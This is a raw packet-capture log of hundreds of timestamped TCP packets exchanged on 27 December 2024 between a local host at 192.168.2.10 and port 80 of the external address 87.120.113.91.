                                                        Dec 27, 2024 14:53:42.039829969 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.039864063 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.040911913 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.041017056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.041059971 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.042187929 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.042273998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.042318106 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.043323994 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.043427944 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.043468952 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.044547081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.044576883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.044611931 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.045748949 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.045929909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.045967102 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.046884060 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.046984911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.047025919 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.048044920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.048093081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.048126936 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.049331903 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.049348116 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.049385071 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.050440073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.050467968 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.050535917 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.051614046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.051758051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.051804066 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.052851915 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.052920103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.052958965 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.053972960 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.100117922 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.116548061 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.116590023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.116683006 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.116898060 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.117038012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.117083073 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.118083954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.118556023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.118596077 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.118679047 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.134820938 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.134874105 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.134929895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.135392904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.135442019 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.135494947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.136552095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.136591911 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.136992931 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.137111902 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.137147903 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.138204098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.138320923 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.138369083 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.139394045 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.139503002 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.139549017 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.140594959 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.140685081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.140721083 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.141753912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.141869068 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.141911030 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.142971039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.143085003 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.143152952 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.144131899 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.144229889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.144260883 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.145332098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.145432949 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.145494938 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.146502018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.146662951 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.146718025 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.147713900 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.147820950 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.147861004 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.148957014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.149023056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.149100065 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.150181055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.150252104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.150290966 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.151246071 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.151365042 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.151417017 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.152468920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.152483940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.152518988 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.153644085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.153739929 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.153819084 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.154829025 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.154937983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.154979944 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.156035900 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.156109095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.156142950 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.157244921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.157277107 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.157315016 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.158420086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.158484936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.158520937 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.159591913 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.159703016 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.159744978 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.160789967 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.160900116 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.160942078 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.161961079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.162087917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.162126064 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.163110018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.163172960 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.163206100 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.164211035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.164302111 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.164343119 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.165597916 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.209475994 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.232515097 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.232574940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.232630968 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.232999086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.233095884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.233134985 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.234147072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.234189987 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.234230995 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.235268116 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.235361099 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.235402107 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.236398935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.236471891 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.236509085 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.237529039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.237603903 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.237641096 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.238662004 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.238744974 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.238784075 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.239749908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.239862919 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.239903927 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.240946054 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.241161108 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.241199017 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.242002010 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.242110968 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.242146969 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.243138075 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.243241072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.243278980 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.244272947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.244390011 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.244425058 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.245440960 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.245518923 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.245554924 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.246521950 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.246618986 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.246654987 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.247651100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.247770071 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.247805119 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.248806953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.248943090 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.248980045 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.249901056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.249993086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.250027895 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.251013994 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.251108885 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.251149893 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.252144098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.252238035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.252279997 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.253320932 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.253420115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.253460884 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.254640102 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.254719973 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.254757881 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.255589008 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.255691051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.255728960 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.256644011 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.256774902 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.256813049 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.257812023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.303195953 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.317671061 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.317779064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.317841053 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.318240881 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.318322897 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.318367004 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.319478035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.319549084 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.319592953 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.320382118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.336510897 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.336563110 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.336652994 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.337043047 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.337084055 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.337133884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.338143110 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.338185072 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.338231087 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.339221954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.339261055 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.339308977 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.340289116 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.340328932 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.340408087 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.341348886 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.341397047 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.341434002 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.342453957 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.342500925 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.342560053 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.343578100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.343616009 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.343622923 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.344594002 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.344634056 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.344707966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.345685959 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.345736027 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.345772982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.346792936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.346831083 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.346884012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.347839117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.347879887 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.347969055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.349040031 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.349076986 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.349081993 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.350019932 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.350075960 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.350126028 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.351072073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.351124048 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.351165056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.353040934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.353055000 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.353116989 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.353283882 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.353323936 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.353411913 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.354418993 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.354463100 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.354501963 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.355453968 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.355499983 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.355536938 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.356534004 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.356601000 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.356601954 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.357563019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.357599020 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.357656956 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.358694077 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.358745098 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.358828068 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.362869024 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.362883091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.362895012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.362906933 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.362909079 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.362920046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.362929106 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.362936020 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.362957001 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.363856077 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.363883018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.363893986 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.364061117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.364099026 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.364144087 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.412653923 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.432794094 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.432826996 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.432898998 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.433062077 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.433145046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.433182001 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.433454990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.433510065 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.433547974 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.433831930 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.433881998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.433921099 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.434592009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.434672117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.434710026 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.435349941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.435406923 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.435444117 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.436111927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.436194897 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.436232090 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.436472893 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.436552048 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.436594009 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.437066078 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.437135935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.437170029 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.437793970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.437841892 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.437875032 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.438451052 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.438534021 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.438574076 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.439132929 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.439184904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.439220905 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.439699888 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.439805031 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.439841986 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.440562010 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.440721035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.440912008 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.441421986 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.441550970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.441584110 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.442265034 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.442378998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.442414999 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.443130970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.443279982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.443322897 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:42.444024086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.444102049 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:42.444150925 CET4972180192.168.2.1087.120.113.91
